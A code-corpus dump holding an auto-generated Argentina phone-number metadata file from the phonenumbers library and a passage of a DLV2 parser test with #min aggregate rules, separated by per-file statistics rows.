print('{}^2 = {}'.format(num_pares, par_quadrado)) | 33.888889 | 58 | 0.570492 | 50 | 305 | 3.28 | 0.34 | 0.292683 | 0.134146 | 0.158537 | 0.890244 | 0.890244 | 0.890244 | 0.890244 | 0.890244 | 0.890244 | 0 | 0.052174 | 0.245902 | 305 | 9 | 59 | 33.888889 | 0.66087 | 0 | 0 | 0.666667 | 0 | 0 | 0.058824 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.222222 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1e7bf95da7b41cdadd0e1bbb2dee59eda6e4a46e | 11,927 | py | Python | venv/lib/python3.6/site-packages/phonenumbers/data/region_AR.py | exdeam/opencrm | dfdcfdf99f0b42eb3959171927cb6574583f5ee0 | [
"MIT"
] | null | null | null | venv/lib/python3.6/site-packages/phonenumbers/data/region_AR.py | exdeam/opencrm | dfdcfdf99f0b42eb3959171927cb6574583f5ee0 | [
"MIT"
] | null | null | null | venv/lib/python3.6/site-packages/phonenumbers/data/region_AR.py | exdeam/opencrm | dfdcfdf99f0b42eb3959171927cb6574583f5ee0 | [
"MIT"
] | null | null | null | """Auto-generated file, do not edit by hand. AR metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_AR = PhoneMetadata(id='AR', country_code=54, international_prefix='00',
general_desc=PhoneNumberDesc(national_number_pattern='(?:11|(?:[2368]|9\\d)\\d)\\d{8}', possible_length=(10, 11), possible_length_local_only=(6, 7, 8)),
fixed_line=PhoneNumberDesc(national_number_pattern='(?:(?:11[2-7]|670)\\d\\d|2(?:2(?:0(?:2[4-6]|[45]\\d)|(?:1[2-6]|3[3-6])\\d|2(?:14|[3467][4-6]|[59][45])|4(?:[156][4-6]|[23]4|4[45])|5(?:2[45]|[45][4-6]|7[3-6])|6(?:[145]4|2[2-6]|[6-8][4-6])|7[1-4]4|8(?:1[3-6]|[356]4|4[2-7])|9(?:1[4-6]|[267]4))|3(?:0(?:2[2-6]|4\\d)|1(?:[47][4-6]|64)|2(?:[03][2-6]|4[3-6]|5[4-6]|6[45])|3[13-8]4|4(?:[24][45]|34|5[4-6]|6[3-6])|5(?:[25][4-6]|[346-8]4)|(?:64|7[45])\\d|9(?:2[3-6]|[3-5]4|6[4-6]))|4(?:7(?:3[45]|[48][4-6]|54|7[2-6])|94\\d)|6(?:(?:04|1[2-7]|[36][45])\\d|2(?:2[2-6]|[46]4|5[4-6])|4(?:[45]\\d|6[0-46-9]|[78]4)|5(?:[1568]4|7[2-7]))|80[45]\\d|9(?:0(?:1[3-6]|2[45]|34)|(?:1[4-6]|9[3-6])\\d|2(?:0[2-7]|[1457-9]4|[26][45]|3[3-6])|3(?:[1356]4|2[4-6]|4[45])|4(?:[08]4|2[2-6]|4\\d|5[02-69]|6[45])|5(?:[23]4|4[2-8])|6(?:[23]4|4[3-6]|6[2-7])|7(?:2[45]|[4-6]\\d)|8(?:24|3[2-6]|[45]\\d)))|3(?:3(?:2(?:7[45]|9[3-6])|64\\d|8[2578][4-6])|4(?:0[0-24-9][4-6]|(?:1[2-7]|2[4-6])\\d|3(?:4\\d|5[0-7]|6[1-69]|[78][4-6])|4(?:2[3-6]|[457][4-6]|6[2-6])|5(?:4[0-4679]|[56][024-6]|8[4-6])|6(?:[03-9][4-6]|2[2-6])|7(?:1[3-6]|2[4-6]|6[2-6])|8(?:[27][2-7]|3[4-6]|4\\d|9[2-6])|9(?:[136-8][4-6]|2[2-7]))|5(?:1[2-8]\\d|2(?:[124][4-6]|5[3-6])|3(?:[23][4-6]|[4-6]\\d|7[3-6])|4(?:1[2-6]|[2689][4-6]|[347][3-6])|6(?:[23][4-6]|4[2-6])|7(?:1[3-6]|[2-6][4-6])|8(?:[23][4-6]|[46]\\d|5[013-7]))|6(?:2[45]|44)\\d|7(?:[069][45]\\d|1(?:[15][46]|6[4-6]|8[3-6])|(?:2[15]|3[145]|4[13])[4-6]|5(?:[17][3-6]|[468][4-6]|5[2-7])|7(?:[2-5][4-6]|7[2-8])|8(?:1[46]|[26][4-6]))|8(?:(?:0[45]|1[2-6])\\d|2(?:1[46]|[5-7][4-6])|3(?:[278][4-6]|4\\d|5[124-6])|4(?:[16][46]|[3-5][4-6])|5(?:[34]\\d|5[0-46-9]|6[0-246-9]|[78][4-6])|6(?:[1-378][4-6]|5[2-8]|9[46])|7(?:[24-6]\\d|3[2-6]|7[4-6]|8[2-7])|8(?:[3-5]\\d|6[0-68]|7[4-6]|8[3-6])|9(?:[12][46]|4[4-6]))))\\d{5}', example_number='1123456789', possible_length=(10,), possible_length_local_only=(6, 7, 8)),
mobile=PhoneNumberDesc(national_number_pattern='(?:675\\d\\d|9(?:11[2-7]\\d\\d|2(?:2(?:0(?:2[4-6]|[45]\\d)|(?:1[2-6]|3[3-6])\\d|2(?:14|[3467][4-6]|[59][45])|4(?:[156][4-6]|[23]4|4[45])|5(?:2[45]|[45][4-6]|7[3-6])|6(?:[145]4|2[2-6]|[6-8][4-6])|7[1-4]4|8(?:1[3-6]|[356]4|4[2-7])|9(?:1[4-6]|[267]4))|3(?:0(?:2[2-6]|4\\d)|1(?:[47][4-6]|64)|2(?:[03][2-6]|4[3-6]|5[4-6]|6[45])|3[13-8]4|4(?:[24][45]|34|5[4-6]|6[3-6])|5(?:[25][4-6]|[346-8]4)|(?:64|7[45])\\d|9(?:2[3-6]|[3-5]4|6[4-6]))|4(?:7(?:3[45]|[48][4-6]|54|7[2-6])|94\\d)|6(?:(?:04|1[2-7]|[36][45])\\d|2(?:2[2-6]|[46]4|5[4-6])|4(?:[45]\\d|6[0-46-9]|[78]4)|5(?:[1568]4|7[2-7]))|80[45]\\d|9(?:0(?:1[3-6]|2[45]|34)|(?:1[4-6]|9[3-6])\\d|2(?:0[2-7]|[1457-9]4|[26][45]|3[3-6])|3(?:[1356]4|2[4-6]|4[45])|4(?:[08]4|2[2-6]|4\\d|5[02-69]|6[45])|5(?:[23]4|4[2-8])|6(?:[23]4|4[3-6]|6[2-7])|7(?:2[45]|[4-6]\\d)|8(?:24|3[2-6]|[45]\\d)))|3(?:3(?:2(?:7[45]|9[3-6])|64\\d|8[2578][4-6])|4(?:0[0-24-9][4-6]|(?:1[2-7]|2[4-6])\\d|3(?:4\\d|5[0-7]|6[1-69]|[78][4-6])|4(?:2[3-6]|[457][4-6]|6[2-6])|5(?:4[0-4679]|[56][024-6]|8[4-6])|6(?:[03-9][4-6]|2[2-6])|7(?:1[3-6]|2[4-6]|6[2-6])|8(?:[27][2-7]|3[4-6]|4\\d|9[2-6])|9(?:[136-8][4-6]|2[2-7]))|5(?:1[2-8]\\d|2(?:[124][4-6]|5[3-6])|3(?:[23][4-6]|[4-6]\\d|7[3-6])|4(?:1[2-6]|[2689][4-6]|[347][3-6])|6(?:[23][4-6]|4[2-6])|7(?:1[3-6]|[2-6][4-6])|8(?:[23][4-6]|[46]\\d|5[013-7]))|6(?:2[45]|44)\\d|7(?:[069][45]\\d|1(?:[15][46]|6[4-6]|8[3-6])|(?:2[15]|3[145]|4[13])[4-6]|5(?:[17][3-6]|[468][4-6]|5[2-7])|7(?:[2-5][4-6]|7[2-8])|8(?:1[46]|[26][4-6]))|8(?:(?:0[45]|1[2-6])\\d|2(?:1[46]|[5-7][4-6])|3(?:[278][4-6]|4\\d|5[124-6])|4(?:[16][46]|[3-5][4-6])|5(?:[34]\\d|5[0-46-9]|6[0-246-9]|[78][4-6])|6(?:[1-378][4-6]|5[2-8]|9[46])|7(?:[24-6]\\d|3[2-6]|7[4-6]|8[2-7])|8(?:[3-5]\\d|6[0-68]|7[4-6]|8[3-6])|9(?:[12][46]|4[4-6])))))\\d{5}', example_number='91123456789', possible_length=(10, 11), possible_length_local_only=(6, 7, 8)),
toll_free=PhoneNumberDesc(national_number_pattern='800\\d{7}', example_number='8001234567', possible_length=(10,)),
premium_rate=PhoneNumberDesc(national_number_pattern='60[04579]\\d{7}', example_number='6001234567', possible_length=(10,)),
uan=PhoneNumberDesc(national_number_pattern='810\\d{7}', example_number='8101234567', possible_length=(10,)),
no_international_dialling=PhoneNumberDesc(national_number_pattern='810\\d{7}', possible_length=(10,)),
national_prefix='0',
national_prefix_for_parsing='0?(?:(11|2(?:2(?:02?|[13]|2[13-79]|4[1-6]|5[2457]|6[124-8]|7[1-4]|8[13-6]|9[1267])|3(?:02?|1[467]|2[03-6]|3[13-8]|[49][2-6]|5[2-8]|[67])|4(?:7[3-578]|9)|6(?:[0136]|2[24-6]|4[6-8]?|5[15-8])|80|9(?:0[1-3]|[19]|2\\d|3[1-6]|4[02568]?|5[2-4]|6[2-46]|72?|8[23]?))|3(?:3(?:2[79]|6|8[2578])|4(?:0[0-24-9]|[12]|3[5-8]?|4[24-7]|5[4-68]?|6[02-9]|7[126]|8[2379]?|9[1-36-8])|5(?:1|2[1245]|3[237]?|4[1-46-9]|6[2-4]|7[1-6]|8[2-5]?)|6[24]|7(?:[069]|1[1568]|2[15]|3[145]|4[13]|5[14-8]|7[2-57]|8[126])|8(?:[01]|2[15-7]|3[2578]?|4[13-6]|5[4-8]?|6[1-357-9]|7[36-8]?|8[5-8]?|9[124])))15)?',
national_prefix_transform_rule='9\\1',
number_format=[NumberFormat(pattern='(\\d{3})', format='\\1', leading_digits_pattern=['[019]']),
NumberFormat(pattern='(\\d{2})(\\d{4})', format='\\1-\\2', leading_digits_pattern=['[2-7]|8[0-7]']),
NumberFormat(pattern='(\\d{3})(\\d{4})', format='\\1-\\2', leading_digits_pattern=['[2-7]|8[013-8]']),
NumberFormat(pattern='(\\d{4})(\\d{4})', format='\\1-\\2', leading_digits_pattern=['[2-7]']),
NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{4})', format='\\1-\\2-\\3', leading_digits_pattern=['[68]'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(\\d{2})(\\d{4})(\\d{4})', format='\\1 \\2-\\3', leading_digits_pattern=['1'], national_prefix_formatting_rule='0\\1', national_prefix_optional_when_formatting=True),
NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{4})', format='\\1 \\2-\\3', leading_digits_pattern=['2(?:2[013]|3[067]|49|6[01346]|8|9[147-9])|3(?:36|4[1-358]|5[138]|6|7[069]|8[013578])', '2(?:2(?:0[45]|[13])|3(?:04|[67])|49|6(?:[0136]|4[4-6])|8|9(?:[19]|[48][45]|7[4-6]))|3(?:36|4(?:[12]|[35][4-6]|84)|5(?:1|[38][4-6])|6|7[069]|8(?:[01]|3[45]|[58][3-6]|7[24-6]))', '2(?:2(?:0[45]|[13])|3(?:04|[67])|49|6(?:[0136]|4(?:[45]|6[0-36-9]))|8|9(?:[19]|4(?:4|5[039])|7[4-6]|8[45]))|3(?:36|4(?:[12]|3(?:4|5[0-47]|6[1-39])|5(?:4[0-379]|[56][02])|84)|5(?:1|3[4-6]|8(?:4[0-36-9]|5[013467]|6))|6|7[069]|8(?:[01]|3(?:4|5[12])|5(?:3|4[0-35-9]|5[0-37-9]|6[0-27-9])|7(?:[245]|6[0-37-9])|8(?:[34]|5[0-37-9]|6[0-28])))', '2(?:2(?:0[45]|[13])|3(?:04|[67])|49|6(?:[0136]|4(?:[45]|6[0-36-9]))|8|9(?:[19]|4(?:4|5(?:[09]|3[016-9]))|7[4-6]|8[45]))|3(?:36|4(?:[12]|3(?:4|5(?:[0-37]|4[347])|6[1-39])|5(?:4[0-379]|[56][02])|84)|5(?:1|3[4-6]|8(?:4(?:[0-37-9]|6[1-9])|5(?:[0137]|4[4-8]|6[0-35-9])|6))|6|7[069]|8(?:[01]|3(?:4|5[12])|5(?:3|4(?:[0-37-9]|5[0289]|6[0-7])|5[0-37-9]|6[0-27-9])|7(?:[245]|6[0-37-9])|8(?:[34]|5[0-37-9]|6[0-28])))'], national_prefix_formatting_rule='0\\1', national_prefix_optional_when_formatting=True),
NumberFormat(pattern='(\\d{4})(\\d{2})(\\d{4})', format='\\1 \\2-\\3', leading_digits_pattern=['[23]'], national_prefix_formatting_rule='0\\1', national_prefix_optional_when_formatting=True),
NumberFormat(pattern='(\\d)(\\d{2})(\\d{4})(\\d{4})', format='\\2 15-\\3-\\4', leading_digits_pattern=['91'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(\\d)(\\d{3})(\\d{3})(\\d{4})', format='\\2 15-\\3-\\4', leading_digits_pattern=['9(?:2[2-4689]|3[3-8])', '9(?:2(?:2[013]|3[067]|49|6[01346]|8|9[147-9])|3(?:36|4[1-358]|5[138]|6|7[069]|8[013578]))', '9(?:2(?:2(?:0[45]|[13])|3(?:04|[67])|49|6(?:[0136]|4[4-6])|8|9(?:[19]|[48][45]|7[4-6]))|3(?:36|4(?:[12]|[35][4-6]|84)|5(?:1|[38][4-6])|6|7[069]|8(?:[01]|3[45]|[58][3-6]|7[24-6])))', '9(?:2(?:2(?:0[45]|[13])|3(?:04|[67])|49|6(?:[0136]|4(?:[45]|6[0-36-9]))|8|9(?:[19]|4(?:4|5[039])|7[4-6]|8[45]))|3(?:36|4(?:[12]|3(?:4|5[0-47]|6[1-39])|5(?:4[0-379]|[56][02])|84)|5(?:1|3[4-6]|8(?:4[0-36-9]|5[013467]|6))|6|7[069]|8(?:[01]|3(?:4|5[12])|5(?:3|4[0-35-9]|5[0-37-9]|6[0-27-9])|7(?:[245]|6[0-37-9])|8(?:[34]|5[0-37-9]|6[0-28]))))', '9(?:2(?:2(?:0[45]|[13])|3(?:04|[67])|49|6(?:[0136]|4(?:[45]|6[0-36-9]))|8|9(?:[19]|4(?:4|5(?:[09]|3[016-9]))|7[4-6]|8[45]))|3(?:36|4(?:[12]|3(?:4|5(?:[0-37]|4[347])|6[1-39])|5(?:4[0-379]|[56][02])|84)|5(?:1|3[4-6]|8(?:4(?:[0-37-9]|6[1-9])|5(?:[0137]|4[4-8]|6[0-35-9])|6))|6|7[069]|8(?:[01]|3(?:4|5[12])|5(?:3|4(?:[0-37-9]|5[0289]|6[0-7])|5[0-37-9]|6[0-27-9])|7(?:[245]|6[0-37-9])|8(?:[34]|5[0-37-9]|6[0-28]))))'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(\\d)(\\d{4})(\\d{2})(\\d{4})', format='\\2 15-\\3-\\4', leading_digits_pattern=['9'], national_prefix_formatting_rule='0\\1')],
intl_number_format=[NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{4})', format='\\1-\\2-\\3', leading_digits_pattern=['[68]']),
NumberFormat(pattern='(\\d{2})(\\d{4})(\\d{4})', format='\\1 \\2-\\3', leading_digits_pattern=['1']),
NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{4})', format='\\1 \\2-\\3', leading_digits_pattern=['2(?:2[013]|3[067]|49|6[01346]|8|9[147-9])|3(?:36|4[1-358]|5[138]|6|7[069]|8[013578])', '2(?:2(?:0[45]|[13])|3(?:04|[67])|49|6(?:[0136]|4[4-6])|8|9(?:[19]|[48][45]|7[4-6]))|3(?:36|4(?:[12]|[35][4-6]|84)|5(?:1|[38][4-6])|6|7[069]|8(?:[01]|3[45]|[58][3-6]|7[24-6]))', '2(?:2(?:0[45]|[13])|3(?:04|[67])|49|6(?:[0136]|4(?:[45]|6[0-36-9]))|8|9(?:[19]|4(?:4|5[039])|7[4-6]|8[45]))|3(?:36|4(?:[12]|3(?:4|5[0-47]|6[1-39])|5(?:4[0-379]|[56][02])|84)|5(?:1|3[4-6]|8(?:4[0-36-9]|5[013467]|6))|6|7[069]|8(?:[01]|3(?:4|5[12])|5(?:3|4[0-35-9]|5[0-37-9]|6[0-27-9])|7(?:[245]|6[0-37-9])|8(?:[34]|5[0-37-9]|6[0-28])))', '2(?:2(?:0[45]|[13])|3(?:04|[67])|49|6(?:[0136]|4(?:[45]|6[0-36-9]))|8|9(?:[19]|4(?:4|5(?:[09]|3[016-9]))|7[4-6]|8[45]))|3(?:36|4(?:[12]|3(?:4|5(?:[0-37]|4[347])|6[1-39])|5(?:4[0-379]|[56][02])|84)|5(?:1|3[4-6]|8(?:4(?:[0-37-9]|6[1-9])|5(?:[0137]|4[4-8]|6[0-35-9])|6))|6|7[069]|8(?:[01]|3(?:4|5[12])|5(?:3|4(?:[0-37-9]|5[0289]|6[0-7])|5[0-37-9]|6[0-27-9])|7(?:[245]|6[0-37-9])|8(?:[34]|5[0-37-9]|6[0-28])))']),
NumberFormat(pattern='(\\d{4})(\\d{2})(\\d{4})', format='\\1 \\2-\\3', leading_digits_pattern=['[23]']),
NumberFormat(pattern='(\\d)(\\d{2})(\\d{4})(\\d{4})', format='\\1 \\2 \\3-\\4', leading_digits_pattern=['91']),
NumberFormat(pattern='(\\d)(\\d{3})(\\d{3})(\\d{4})', format='\\1 \\2 \\3-\\4', leading_digits_pattern=['9(?:2[2-4689]|3[3-8])', '9(?:2(?:2[013]|3[067]|49|6[01346]|8|9[147-9])|3(?:36|4[1-358]|5[138]|6|7[069]|8[013578]))', '9(?:2(?:2(?:0[45]|[13])|3(?:04|[67])|49|6(?:[0136]|4[4-6])|8|9(?:[19]|[48][45]|7[4-6]))|3(?:36|4(?:[12]|[35][4-6]|84)|5(?:1|[38][4-6])|6|7[069]|8(?:[01]|3[45]|[58][3-6]|7[24-6])))', '9(?:2(?:2(?:0[45]|[13])|3(?:04|[67])|49|6(?:[0136]|4(?:[45]|6[0-36-9]))|8|9(?:[19]|4(?:4|5[039])|7[4-6]|8[45]))|3(?:36|4(?:[12]|3(?:4|5[0-47]|6[1-39])|5(?:4[0-379]|[56][02])|84)|5(?:1|3[4-6]|8(?:4[0-36-9]|5[013467]|6))|6|7[069]|8(?:[01]|3(?:4|5[12])|5(?:3|4[0-35-9]|5[0-37-9]|6[0-27-9])|7(?:[245]|6[0-37-9])|8(?:[34]|5[0-37-9]|6[0-28]))))', '9(?:2(?:2(?:0[45]|[13])|3(?:04|[67])|49|6(?:[0136]|4(?:[45]|6[0-36-9]))|8|9(?:[19]|4(?:4|5(?:[09]|3[016-9]))|7[4-6]|8[45]))|3(?:36|4(?:[12]|3(?:4|5(?:[0-37]|4[347])|6[1-39])|5(?:4[0-379]|[56][02])|84)|5(?:1|3[4-6]|8(?:4(?:[0-37-9]|6[1-9])|5(?:[0137]|4[4-8]|6[0-35-9])|6))|6|7[069]|8(?:[01]|3(?:4|5[12])|5(?:3|4(?:[0-37-9]|5[0289]|6[0-7])|5[0-37-9]|6[0-27-9])|7(?:[245]|6[0-37-9])|8(?:[34]|5[0-37-9]|6[0-28]))))']),
NumberFormat(pattern='(\\d)(\\d{4})(\\d{2})(\\d{4})', format='\\1 \\2 \\3-\\4', leading_digits_pattern=['9'])],
mobile_number_portable_region=True)
| 350.794118 | 1,894 | 0.485789 | 2,982 | 11,927 | 1.900402 | 0.059356 | 0.045174 | 0.022587 | 0.017646 | 0.833951 | 0.816128 | 0.793542 | 0.773425 | 0.773425 | 0.768131 | 0 | 0.308044 | 0.027501 | 11,927 | 33 | 1,895 | 361.424242 | 0.180533 | 0.004444 | 0 | 0 | 1 | 0.612903 | 0.754803 | 0.717307 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.032258 | 0 | 0.032258 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 15 |
1e8091ad5c5d7d22fbb51931583371c3143e0414 | 10,023 | py | Python | tests/parser/aggregates.min.2.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/aggregates.min.2.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/aggregates.min.2.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | input = """
% Aggregates defined into the body of rules, constraints and weak constraints.
% No model is computed as, at least the last strong constraint is always violated.
a(2).
a(3).
b.
c.
d.
p(1,2).
p(1,3).
p(1,4).
q(1,3).
r(1,2).
s(2,4).
t(3,4).
%---- #min{...} op var ----(at the end)
okay1(M, N) :- p(M, N), #min{V : a(V), b, c} = N.
okay2(M, N) :- p(M, N), #min{V : a(V), b, c} < N.
okay3(M, N) :- p(M, N), #min{V : a(V), b, c} <= N.
okay4(M, N) :- p(M, N), #min{V : a(V), b, c} > M.
okay5(M, N) :- p(M, N), #min{V : a(V), b, c} >= N.
:- p(M, N), #min{V : a(V), b, c} = M.
%:- p(M, N), #min{V : a(V), b, c} = M.
:- p(M, N), #min{V : a(V), b, c} < M.
%:- p(M, N), #min{V : a(V), b, c} < M.
:- p(M, N), #min{V : a(V), b, c} <= M.
%:- p(M, N), #min{V : a(V), b, c} <= M.
:- q(M, N), #min{V : a(V), b, c} > N.
%:- q(M, N), #min{V : a(V), b, c} > N.
:- q(M, N), #min{V : a(V), b, c} >= N.
%:- q(M, N), #min{V : a(V), b, c} >= N.
%---- #min{...} op var ----(at the beginning)
okay6(M, N) :- #min{V : a(V), b, c} = N, p(M, N).
okay7(M, N) :- #min{V : a(V), b, c} < N, p(M, N).
okay8(M, N) :- #min{V : a(V), b, c} <= N, p(M, N).
okay9(M, N) :- #min{V : a(V), b, c} > M, p(M, N).
okay10(M, N) :- #min{V : a(V), b, c} >= N, p(M, N).
:- #min{V : a(V), b, c} = N, q(M, N).
%:- #min{V : a(V), b, c} = N, q(M, N).
:- #min{V : a(V), b, c} < M, p(M, N).
%:- #min{V : a(V), b, c} < M, p(M, N).
:- #min{V : a(V), b, c} <= M, p(M, N).
%:- #min{V : a(V), b, c} <= M, p(M, N).
:- #min{V : a(V), b, c} > N, q(M, N).
%:- #min{V : a(V), b, c} > N, q(M, N).
:- #min{V : a(V), b, c} >= N, q(M, N).
%:- #min{V : a(V), b, c} >= N, q(M, N).
%---- var op #min{...}----(at the end)
okay11(M, N) :- p(M, N), N = #min{V : a(V), b, c}.
okay12(M, N) :- p(M, N), M < #min{V : a(V), b, c}.
okay13(M, N) :- p(M, N), N <= #min{V : a(V), b, c}.
okay14(M, N) :- p(M, N), N > #min{V : a(V), b, c}.
okay15(M, N) :- p(M, N), N >= #min{V : a(V), b, c}.
:- p(M, N), M = #min{V : a(V), b, c}.
%:- p(M, N), M = #min{V : a(V), b, c}.
:- q(M, N), N < #min{V : a(V), b, c}.
%:- q(M, N), N < #min{V : a(V), b, c}.
:- q(M, N), N <= #min{V : a(V), b, c}.
%:- q(M, N), N <= #min{V : a(V), b, c}.
:- p(M, N), M > #min{V : a(V), b, c}.
%:- p(M, N), M > #min{V : a(V), b, c}.
:- p(M, N), M >= #min{V : a(V), b, c}.
%:- p(M, N), M >= #min{V : a(V), b, c}.
%---- var op #min{...}---- (at the beginning)
okay16(M, N) :- N = #min{V : a(V), b, c}, p(M, N).
okay17(M, N) :- M < #min{V : a(V), b, c}, p(M, N).
okay18(M, N) :- N <= #min{V : a(V), b, c}, p(M, N).
okay19(M, N) :- N > #min{V : a(V), b, c}, p(M, N).
okay20(M, N) :- N >= #min{V : a(V), b, c}, p(M, N).
:- M = #min{V : a(V), b, c}, p(M, N).
%:- M = #min{V : a(V), b, c}, p(M, N).
:- N < #min{V : a(V), b, c}, q(M, N).
%:- N < #min{V : a(V), b, c}, q(M, N).
:- N <= #min{V : a(V), b, c}, q(M, N).
%:- N <= #min{V : a(V), b, c}, q(M, N).
:- M > #min{V : a(V), b, c}, p(M, N).
%:- M > #min{V : a(V), b, c}, p(M, N).
:- M >= #min{V : a(V), b, c}, p(M, N).
%:- M >= #min{V : a(V), b, c}, p(M, N).
%---- var < #min{...} < var ----
okay21(M, N) :- p(M, N), M < #min{V : a(V), b, c} < N.
okay22(M, N) :- M < #min{V : a(V), b, c} < N, p(M, N).
:- r(M, N), M < #min{V : a(V), b, c} < N.
:- M < #min{V : a(V), b, c} < N, r(M, N).
%:- r(M, N), M < #min{V : a(V), b, c} < N.
%:- M < #min{V : a(V), b, c} < N, r(M, N).
%---- var < #min{...} <= var ----
okay23(M, N) :- q(M, N), M < #min{V : a(V), b, c} <= N.
okay24(M, N) :- M < #min{V : a(V), b, c} <= N, q(M, N).
:- s(M, N), M < #min{V : a(V), b, c} <= N.
:- M < #min{V : a(V), b, c} <= N, s(M, N).
%:- s(M, N), M < #min{V : a(V), b, c} <= N.
%:- M < #min{V : a(V), b, c} <= N, s(M, N).
%---- var <= #min{...} < var ----
okay25(M, N) :- p(M, N), M <= #min{V : a(V), b, c} < N.
okay26(M, N) :- M <= #min{V : a(V), b, c} < N, p(M, N).
:- r(M, N), M <= #min{V : a(V), b, c} < N.
:- M <= #min{V : a(V), b, c} < N, r(M, N).
%:- r(M, N), M <= #min{V : a(V), b, c} < N.
%:- M <= #min{V : a(V), b, c} < N, r(M, N).
%---- var <= #min{...} <= var ----
okay27(M, N) :- s(M, N), M <= #min{V : a(V), b, c} <= N.
okay28(M, N) :- M <= #min{V : a(V), b, c} <= N, s(M, N).
:- t(M, N), M <= #min{V : a(V), b, c} <= N.
% The following constraint is always violated.
:- M <= #min{V : a(V), b, c} <= N, p(M, N).
%:- t(M, N), M <= #min{V : a(V), b, c} <= N.
%:- M <= #min{V : a(V), b, c} <= N, t(M, N).
"""
output = """
% Aggregates defined into the body of rules, constraints and weak constraints.
% No model is computed as, at least the last strong constraint is always violated.
a(2).
a(3).
b.
c.
d.
p(1,2).
p(1,3).
p(1,4).
q(1,3).
r(1,2).
s(2,4).
t(3,4).
%---- #min{...} op var ----(at the end)
okay1(M, N) :- p(M, N), #min{V : a(V), b, c} = N.
okay2(M, N) :- p(M, N), #min{V : a(V), b, c} < N.
okay3(M, N) :- p(M, N), #min{V : a(V), b, c} <= N.
okay4(M, N) :- p(M, N), #min{V : a(V), b, c} > M.
okay5(M, N) :- p(M, N), #min{V : a(V), b, c} >= N.
:- p(M, N), #min{V : a(V), b, c} = M.
%:- p(M, N), #min{V : a(V), b, c} = M.
:- p(M, N), #min{V : a(V), b, c} < M.
%:- p(M, N), #min{V : a(V), b, c} < M.
:- p(M, N), #min{V : a(V), b, c} <= M.
%:- p(M, N), #min{V : a(V), b, c} <= M.
:- q(M, N), #min{V : a(V), b, c} > N.
%:- q(M, N), #min{V : a(V), b, c} > N.
:- q(M, N), #min{V : a(V), b, c} >= N.
%:- q(M, N), #min{V : a(V), b, c} >= N.
%---- #min{...} op var ----(at the beginning)
okay6(M, N) :- #min{V : a(V), b, c} = N, p(M, N).
okay7(M, N) :- #min{V : a(V), b, c} < N, p(M, N).
okay8(M, N) :- #min{V : a(V), b, c} <= N, p(M, N).
okay9(M, N) :- #min{V : a(V), b, c} > M, p(M, N).
okay10(M, N) :- #min{V : a(V), b, c} >= N, p(M, N).
:- #min{V : a(V), b, c} = N, q(M, N).
%:- #min{V : a(V), b, c} = N, q(M, N).
:- #min{V : a(V), b, c} < M, p(M, N).
%:- #min{V : a(V), b, c} < M, p(M, N).
:- #min{V : a(V), b, c} <= M, p(M, N).
%:- #min{V : a(V), b, c} <= M, p(M, N).
:- #min{V : a(V), b, c} > N, q(M, N).
%:- #min{V : a(V), b, c} > N, q(M, N).
:- #min{V : a(V), b, c} >= N, q(M, N).
%:- #min{V : a(V), b, c} >= N, q(M, N).
%---- var op #min{...}----(at the end)
okay11(M, N) :- p(M, N), N = #min{V : a(V), b, c}.
okay12(M, N) :- p(M, N), M < #min{V : a(V), b, c}.
okay13(M, N) :- p(M, N), N <= #min{V : a(V), b, c}.
okay14(M, N) :- p(M, N), N > #min{V : a(V), b, c}.
okay15(M, N) :- p(M, N), N >= #min{V : a(V), b, c}.
:- p(M, N), M = #min{V : a(V), b, c}.
%:- p(M, N), M = #min{V : a(V), b, c}.
:- q(M, N), N < #min{V : a(V), b, c}.
%:- q(M, N), N < #min{V : a(V), b, c}.
:- q(M, N), N <= #min{V : a(V), b, c}.
%:- q(M, N), N <= #min{V : a(V), b, c}.
:- p(M, N), M > #min{V : a(V), b, c}.
%:- p(M, N), M > #min{V : a(V), b, c}.
:- p(M, N), M >= #min{V : a(V), b, c}.
%:- p(M, N), M >= #min{V : a(V), b, c}.
%---- var op #min{...}---- (at the beginning)
okay16(M, N) :- N = #min{V : a(V), b, c}, p(M, N).
okay17(M, N) :- M < #min{V : a(V), b, c}, p(M, N).
okay18(M, N) :- N <= #min{V : a(V), b, c}, p(M, N).
okay19(M, N) :- N > #min{V : a(V), b, c}, p(M, N).
okay20(M, N) :- N >= #min{V : a(V), b, c}, p(M, N).
:- M = #min{V : a(V), b, c}, p(M, N).
%:- M = #min{V : a(V), b, c}, p(M, N).
:- N < #min{V : a(V), b, c}, q(M, N).
%:- N < #min{V : a(V), b, c}, q(M, N).
:- N <= #min{V : a(V), b, c}, q(M, N).
%:- N <= #min{V : a(V), b, c}, q(M, N).
:- M > #min{V : a(V), b, c}, p(M, N).
%:- M > #min{V : a(V), b, c}, p(M, N).
:- M >= #min{V : a(V), b, c}, p(M, N).
%:- M >= #min{V : a(V), b, c}, p(M, N).
%---- var < #min{...} < var ----
okay21(M, N) :- p(M, N), M < #min{V : a(V), b, c} < N.
okay22(M, N) :- M < #min{V : a(V), b, c} < N, p(M, N).
